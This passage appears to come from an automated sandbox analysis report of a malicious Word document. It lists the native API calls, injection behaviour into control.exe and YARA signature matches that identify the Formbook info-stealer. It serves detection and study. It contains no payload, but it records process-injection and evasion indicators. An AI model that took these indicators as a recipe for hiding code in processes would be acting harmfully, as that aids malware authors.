Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_00419FE0 NtReadFile, 5_2_00419FE0
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0041A05A NtClose, 5_2_0041A05A
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0041A10A NtAllocateVirtualMemory, 5_2_0041A10A
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_009300C4 NtCreateFile,LdrInitializeThunk, 5_2_009300C4
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_00930048 NtProtectVirtualMemory,LdrInitializeThunk, 5_2_00930048
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_00930078 NtResumeThread,LdrInitializeThunk, 5_2_00930078
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092F9F0 NtClose,LdrInitializeThunk, 5_2_0092F9F0
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092F900 NtReadFile,LdrInitializeThunk, 5_2_0092F900
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_0092FAD0
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092FAE8 NtQueryInformationProcess,LdrInitializeThunk, 5_2_0092FAE8
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092FBB8 NtQueryInformationToken,LdrInitializeThunk, 5_2_0092FBB8
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092FB68 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_0092FB68
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092FC90 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_0092FC90
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092FC60 NtMapViewOfSection,LdrInitializeThunk, 5_2_0092FC60
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092FD8C NtDelayExecution,LdrInitializeThunk, 5_2_0092FD8C
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092FDC0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_0092FDC0
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092FEA0 NtReadVirtualMemory,LdrInitializeThunk, 5_2_0092FEA0
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_0092FED0
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092FFB4 NtCreateSection,LdrInitializeThunk, 5_2_0092FFB4
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_009310D0 NtOpenProcessToken, 5_2_009310D0
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_00930060 NtQuerySection, 5_2_00930060
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_009301D4 NtSetValueKey, 5_2_009301D4
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0093010C NtOpenDirectoryObject, 5_2_0093010C
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_00931148 NtOpenThread, 5_2_00931148
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_009307AC NtCreateMutant, 5_2_009307AC
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092F8CC NtWaitForSingleObject, 5_2_0092F8CC
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_00931930 NtSetContextThread, 5_2_00931930
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092F938 NtWriteFile, 5_2_0092F938
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092FAB8 NtQueryValueKey, 5_2_0092FAB8
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092FA20 NtQueryInformationFile, 5_2_0092FA20
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092FA50 NtEnumerateValueKey, 5_2_0092FA50
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092FBE8 NtQueryVirtualMemory, 5_2_0092FBE8
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092FB50 NtCreateKey, 5_2_0092FB50
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092FC30 NtOpenProcess, 5_2_0092FC30
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_00930C40 NtGetContextThread, 5_2_00930C40
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092FC48 NtSetInformationFile, 5_2_0092FC48
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_00931D80 NtSuspendThread, 5_2_00931D80
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092FD5C NtEnumerateKey, 5_2_0092FD5C
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092FE24 NtWriteVirtualMemory, 5_2_0092FE24
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092FFFC NtCreateProcessEx, 5_2_0092FFFC
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092FF34 NtQueueApcThread, 5_2_0092FF34
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F800C4 NtCreateFile,LdrInitializeThunk, 7_2_01F800C4
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F807AC NtCreateMutant,LdrInitializeThunk, 7_2_01F807AC
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7F9F0 NtClose,LdrInitializeThunk, 7_2_01F7F9F0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7F900 NtReadFile,LdrInitializeThunk, 7_2_01F7F900
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7FBB8 NtQueryInformationToken,LdrInitializeThunk, 7_2_01F7FBB8
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7FB68 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_01F7FB68
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7FB50 NtCreateKey,LdrInitializeThunk, 7_2_01F7FB50
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7FAE8 NtQueryInformationProcess,LdrInitializeThunk, 7_2_01F7FAE8
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 7_2_01F7FAD0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7FAB8 NtQueryValueKey,LdrInitializeThunk, 7_2_01F7FAB8
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7FDC0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_01F7FDC0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7FD8C NtDelayExecution,LdrInitializeThunk, 7_2_01F7FD8C
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7FC60 NtMapViewOfSection,LdrInitializeThunk, 7_2_01F7FC60
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7FFB4 NtCreateSection,LdrInitializeThunk, 7_2_01F7FFB4
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 7_2_01F7FED0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F801D4 NtSetValueKey, 7_2_01F801D4
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F81148 NtOpenThread, 7_2_01F81148
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F8010C NtOpenDirectoryObject, 7_2_01F8010C
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F810D0 NtOpenProcessToken, 7_2_01F810D0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F80078 NtResumeThread, 7_2_01F80078
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F80060 NtQuerySection, 7_2_01F80060
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F80048 NtProtectVirtualMemory, 7_2_01F80048
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F81930 NtSetContextThread, 7_2_01F81930
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7F938 NtWriteFile, 7_2_01F7F938
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7F8CC NtWaitForSingleObject, 7_2_01F7F8CC
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7FBE8 NtQueryVirtualMemory, 7_2_01F7FBE8
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7FA50 NtEnumerateValueKey, 7_2_01F7FA50
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7FA20 NtQueryInformationFile, 7_2_01F7FA20
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F81D80 NtSuspendThread, 7_2_01F81D80
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7FD5C NtEnumerateKey, 7_2_01F7FD5C
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7FC90 NtUnmapViewOfSection, 7_2_01F7FC90
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F80C40 NtGetContextThread, 7_2_01F80C40
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7FC48 NtSetInformationFile, 7_2_01F7FC48
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7FC30 NtOpenProcess, 7_2_01F7FC30
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7FFFC NtCreateProcessEx, 7_2_01F7FFFC
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7FF34 NtQueueApcThread, 7_2_01F7FF34
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7FEA0 NtReadVirtualMemory, 7_2_01F7FEA0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7FE24 NtWriteVirtualMemory, 7_2_01F7FE24
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000FA060 NtClose, 7_2_000FA060
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000FA110 NtAllocateVirtualMemory, 7_2_000FA110
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000F9F30 NtCreateFile, 7_2_000F9F30
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000F9FE0 NtReadFile, 7_2_000F9FE0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000FA05A NtClose, 7_2_000FA05A
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000FA10A NtAllocateVirtualMemory, 7_2_000FA10A
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01E493EE NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose, 7_2_01E493EE
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01E49882 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread, 7_2_01E49882
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01E493F2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 7_2_01E493F2
Detected potential crypto function
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_009CDBDA 5_2_009CDBDA
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_00967B00 5_2_00967B00
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_009DFDDD 5_2_009DFDDD
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_00970D3B 5_2_00970D3B
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0094CD5B 5_2_0094CD5B
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_00972E2F 5_2_00972E2F
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0095EE4C 5_2_0095EE4C
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_00950F3F 5_2_00950F3F
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0096DF7C 5_2_0096DF7C
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_02031238 7_2_02031238
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F8E0C6 7_2_01F8E0C6
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01FA905A 7_2_01FA905A
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F93040 7_2_01F93040
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_020363BF 7_2_020363BF
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01FBD005 7_2_01FBD005
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01FB63DB 7_2_01FB63DB
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F8F3CF 7_2_01F8F3CF
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01FDA37B 7_2_01FDA37B
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F97353 7_2_01F97353
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F92305 7_2_01F92305
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F8E2E9 7_2_01F8E2E9
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01FAC5F0 7_2_01FAC5F0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_02032622 7_2_02032622
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01FD6540 7_2_01FD6540
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F9351F 7_2_01F9351F
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01FA1489 7_2_01FA1489
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01FC5485 7_2_01FC5485
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01FCD47D 7_2_01FCD47D
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0201579A 7_2_0201579A
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01FC57C3 7_2_01FC57C3
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0201443E 7_2_0201443E
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F9C7BC 7_2_01F9C7BC
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F9E6C1 7_2_01F9E6C1
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F94680 7_2_01F94680
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01FDA634 7_2_01FDA634
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01FA69FE 7_2_01FA69FE
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F929B2 7_2_01F929B2
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_02043A83 7_2_02043A83
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01FB286D 7_2_01FB286D
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F9C85C 7_2_01F9C85C
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0203CBA4 7_2_0203CBA4
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0201DBDA 7_2_0201DBDA
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F8FBD7 7_2_01F8FBD7
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0202F8EE 7_2_0202F8EE
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01FB7B00 7_2_01FB7B00
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0201394B 7_2_0201394B
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_02015955 7_2_02015955
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0203098E 7_2_0203098E
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F9CD5B 7_2_01F9CD5B
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01FC0D3B 7_2_01FC0D3B
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0202CFB1 7_2_0202CFB1
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_02002FDC 7_2_02002FDC
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01FBDF7C 7_2_01FBDF7C
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01FA0F3F 7_2_01FA0F3F
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01FAEE4C 7_2_01FAEE4C
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01FC2E2F 7_2_01FC2E2F
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0202FDDD 7_2_0202FDDD
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000FE1CF 7_2_000FE1CF
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000FD23B 7_2_000FD23B
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000E2D87 7_2_000E2D87
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000E2D90 7_2_000E2D90
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000E9E40 7_2_000E9E40
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000FBFB6 7_2_000FBFB6
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000E2FB0 7_2_000E2FB0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01E49882 7_2_01E49882
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01E48152 7_2_01E48152
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01E41069 7_2_01E41069
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01E41072 7_2_01E41072
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01E45B22 7_2_01E45B22
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01E45B1F 7_2_01E45B1F
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01E4AA52 7_2_01E4AA52
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01E4DA0C 7_2_01E4DA0C
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01E42CE9 7_2_01E42CE9
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01E42CF2 7_2_01E42CF2
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\control.exe Code function: String function: 01FD373B appears 244 times
Source: C:\Windows\SysWOW64\control.exe Code function: String function: 01F8DF5C appears 119 times
Source: C:\Windows\SysWOW64\control.exe Code function: String function: 01FD3F92 appears 132 times
Source: C:\Windows\SysWOW64\control.exe Code function: String function: 01FFF970 appears 84 times
Source: C:\Windows\SysWOW64\control.exe Code function: String function: 01F8E2A8 appears 38 times
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: String function: 0093DF5C appears 110 times
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: String function: 0098373B appears 238 times
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: String function: 009AF970 appears 81 times
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: String function: 00983F92 appears 108 times
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: String function: 0093E2A8 appears 38 times
PE file contains strange resources
Source: sirtx[1].exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: sirt3512.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Yara signature match
Source: 00000007.00000002.2353252437.00000000001D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2353252437.00000000001D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2353301076.0000000000290000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2353301076.0000000000290000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2132134881.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2132134881.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2132063520.0000000000180000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2132063520.0000000000180000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2094658238.0000000003F49000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2094658238.0000000003F49000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.2092914206.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.2092914206.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2132009638.00000000000F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2132009638.00000000000F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2353128733.00000000000E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2353128733.00000000000E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.sirt3512.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.sirt3512.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.sirt3512.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.sirt3512.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.sirt3512.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.sirt3512.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.sirt3512.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.sirt3512.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.sirt3512.exe.3f494f0.5.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.sirt3512.exe.3f494f0.5.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: sirtx[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: sirt3512.exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: explorer.exe, 00000006.00000000.2102624718.0000000003C40000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.expl.evad.winDOC@9/8@3/3
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$QUIRY-PO3010773..EPR55804.doc
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD01A.tmp
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
